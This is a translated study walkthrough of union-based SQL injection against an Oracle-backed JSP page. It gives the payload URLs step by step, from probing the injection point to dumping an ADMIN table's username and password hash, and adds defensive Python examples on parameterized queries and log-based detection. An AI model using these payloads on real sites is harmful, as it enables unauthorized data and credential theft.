Oracle database injection (walkthrough led by a senior)

0X01 Initial detection

a.jsp?username=SMITH and 1=1

This shows the parameter is enclosed in single quotes. We try to construct a matching closing quote, and the injection point is confirmed:

a.jsp?username=SMITH' and '1'='1    (correct)
a.jsp?username=SMITH' and '1'='2    (wrong)

0X02 Determining the query structure

a.jsp?username=SMITH' order by 8--    (correct)
a.jsp?username=SMITH' order by 9--    (wrong)

Use null to work out which columns are character-typed: columns 2 and 3 are character-typed.

a.jsp?username=SMITH' union select null,'null',null,null,null,null,null,null from dual--    (correct)
a.jsp?username=SMITH' union select null,null,'null',null,null,null,null,null from dual--    (correct)

a.jsp?username=SMITH' union select 'null',null,null,null,null,null,null,null from dual--    (wrong)
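The mechanism behind the probes above, as an added example that is not part of the original post: an offline sqlite3 stand-in for the Oracle back end (the table and its rows are constructed), with the vulnerable string-concatenation lookup next to a parameterized version. The same `'1'='1`, `'1'='2` and `order by N--` probes change what the vulnerable function returns, and an out-of-range `order by` turns into a database error (the "wrong" page the post relies on), while the bound-parameter version treats every probe as a literal username and returns nothing.

```python
import sqlite3


# Constructed stand-in for the application's back-end table (sqlite3 instead of
# Oracle; the string-concatenation flaw behaves the same way in both).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE emp (empno INTEGER, ename TEXT, job TEXT)")
    conn.executemany(
        "INSERT INTO emp VALUES (?, ?, ?)",
        [(7369, "SMITH", "CLERK"), (7499, "ALLEN", "SALESMAN"), (7566, "JONES", "MANAGER")],
    )
    return conn


def lookup_vulnerable(conn, username):
    # The flaw the post exploits: the request parameter is spliced into the SQL
    # text, so a quote inside it ends the literal and the rest is parsed as SQL.
    sql = "SELECT empno, ename, job FROM emp WHERE ename = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    # Bound parameter: the value travels separately from the statement text, so
    # quotes and keywords inside it are just characters of the name being compared.
    sql = "SELECT empno, ename, job FROM emp WHERE ename = ?"
    return conn.execute(sql, (username,)).fetchall()


def outcome(lookup, conn, username):
    # Row count, or "error" when the database rejects the statement. In the web
    # app that rejection becomes an error page, which is the "correct"/"wrong"
    # signal the probes in the post read.
    try:
        return len(lookup(conn, username))
    except sqlite3.Error:
        return "error"


def compare_probes():
    conn = make_db()
    probes = [
        "SMITH",                 # legitimate input
        "SMITH' and '1'='1",     # tautology: page looks normal
        "SMITH' and '1'='2",     # contradiction: empty result
        "SMITH' order by 3--",   # column-count guess, in range
        "SMITH' order by 9--",   # column-count guess, out of range -> error
    ]
    return {
        p: (outcome(lookup_vulnerable, conn, p), outcome(lookup_safe, conn, p))
        for p in probes
    }


if __name__ == "__main__":
    for probe, (vuln, safe) in compare_probes().items():
        print(f"{probe!r:24} vulnerable={vuln!s:6} parameterized={safe}")
```

Running it shows the parameterized lookup returning one row for `SMITH` and zero rows for every probe, with no error to distinguish them; that is the fix for the whole chain that follows, independent of any filtering on the input.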

0X03 Gathering information

Database version:

a.jsp?username=SMITH' union select null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null from dual--

?username=SMITH' union select null,(select banner from sys.v_$version where rownum=1),(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual),null,null,null,null,null from dual--

The current user is SCOTT.

(select member from v$logfile where rownum=1)    operating system platform
(select instance_name from v$instance)    server SID

0X04 Dumping table names; the first table is ADMIN

?username=SMITH' union select null,(select table_name from user_tables where rownum=1),null,null,null,null,null,null from dual--

Second table: BONUS

a.jsp?username=SMITH' union select null,(select table_name from user_tables where rownum=1 and table_name not in('ADMIN')),null,null,null,null,null,null from dual--

Third table; the remaining ones follow the same pattern

a.jsp?username=SMITH' union select null,(select table_name from user_tables where rownum=1 and table_name not in('ADMIN','BONUS')),null,null,null,null,null,null from dual--

0X05 Dumping column names

First: ID

a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1 and table_name=('ADMIN')),null,null,null,null,null,null from dual--

Second: USERNAME

a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1 and table_name=('ADMIN') and column_name not in('ID')),null,null,null,null,null,null from dual--

Third: PASSWORD

a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1 and table_name=('ADMIN') and column_name not in('ID','USERNAME')),null,null,null,null,null,null from dual--

0X06 Dumping column contents: USERNAME=admin

/a.jsp?username=SMITH' union select null,(select USERNAME from ADMIN where rownum=1),null,null,null,null,null,null from dual--
a.jsp?username=SMITH' union select null,(select PASSWORD from ADMIN where rownum=1),null,null,null,null,null,null from dual--

PASSWORD=e10adc3949ba59abbe56e057f20f883e    (MD5 of 123456)

Other

Listing "database" (schema owner) names: the first is SYS; the others are derived the same way as above, the second is SYSTEM, and so on until all of them are dumped.

a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1),null,null,null,null,null,null from dual--
a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1 and owner not in('SYS')),null,null,null,null,null,null from dual--
a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1 and owner not in('SYS','SYSTEM','EXFSYS','CTXSYS','XDB','MDSYS','APEX_030200','SCOTT','OLAPSYS')),null,null,null,null,null,null from dual--

Listing table names works the same way; the first is DUAL

/a.jsp?username=SMITH' union select null,(SELECT table_name FROM all_tables where rownum=1),null,null,null,null,null,null from dual--

Listing column names

.jsp?username=SMITH' union select null,(SELECT column_name FROM all_tab_columns WHERE table_name='DUAL' and rownum=1),null,null,null,null,null,null from dual--
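What this enumeration looks like from the server side, as an added example that is not part of the original post: a small scanner over constructed access-log lines that URL-decodes each query string and flags the indicators the steps above leave behind (UNION SELECT, FROM DUAL, ORDER BY n probes, references to v$version / user_tables / all_tab_columns, SYS_CONTEXT, and quoted tautologies). The log lines and IP addresses are constructed; the indicator patterns are assumptions drawn from the payloads on this page, not a complete rule set.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (combined-log style) for the server hosting a.jsp.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2019:10:00:01 +0800] "GET /a.jsp?username=SMITH HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jun/2019:10:00:02 +0800] "GET /a.jsp?username=SMITH%27%20order%20by%209-- HTTP/1.1" 500 312',
    '203.0.113.5 - - [10/Jun/2019:10:00:03 +0800] "GET /a.jsp?username=SMITH%27%20union%20select%20null%2C%28select%20banner%20from%20sys.v_%24version%20where%20rownum%3D1%29%2Cnull%20from%20dual-- HTTP/1.1" 200 640',
    '198.51.100.7 - - [10/Jun/2019:10:00:04 +0800] "GET /a.jsp?username=ALLEN HTTP/1.1" 200 498',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Indicators matched against the decoded, whitespace-collapsed query string.
# They are derived from the payload shapes in the post (assumed, not exhaustive).
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "from_dual": re.compile(r"\bfrom\s+dual\b", re.I),
    "oracle_dictionary": re.compile(
        r"\b(?:sys\.)?(?:v_?\$(?:version|logfile|instance)|user_tables|user_tab_columns"
        r"|all_tables|all_tab_columns)\b",
        re.I,
    ),
    "sys_context": re.compile(r"\bsys_context\s*\(", re.I),
    "quoted_tautology": re.compile(r"'\s*(?:and|or)\s+'?\w+'?\s*=\s*'?\w+", re.I),
}


def decode_query(target):
    # Decode percent-encoding and '+' once, then collapse whitespace so the
    # indicator patterns do not depend on how the client spaced the payload.
    query = urlsplit(target).query
    return " ".join(unquote_plus(query).split())


def scan_line(line):
    # Parse one log line; return None for lines that do not fit the format.
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_query(m["target"])
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
    return {"ip": m["ip"], "status": int(m["status"]), "query": decoded, "hits": hits}


def scan(lines):
    # Only lines with at least one indicator are reported.
    return [r for r in map(scan_line, lines) if r and r["hits"]]


def suspicious_sources(lines):
    # Flagged requests per client address: an enumeration like the one in the
    # post produces dozens of these from a single source in a short window.
    counts = {}
    for r in scan(lines):
        counts[r["ip"]] = counts.get(r["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ip"], r["status"], r["hits"], r["query"])
    print(suspicious_sources(SAMPLE_LOG))
```

The 500 status on the `order by 9--` request is itself useful: the error-based "correct/wrong" oracle from 0X02 shows up as a burst of 5xx responses from one address interleaved with 200s, so pairing the pattern hits with status codes per source reduces false positives. Real traffic also needs double-decoding and case folding before matching, which this example does not attempt.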

by: thanks to 卿哥 for leading this study session
Original: https://www.cnblogs.com/-zhong/p/10948575.html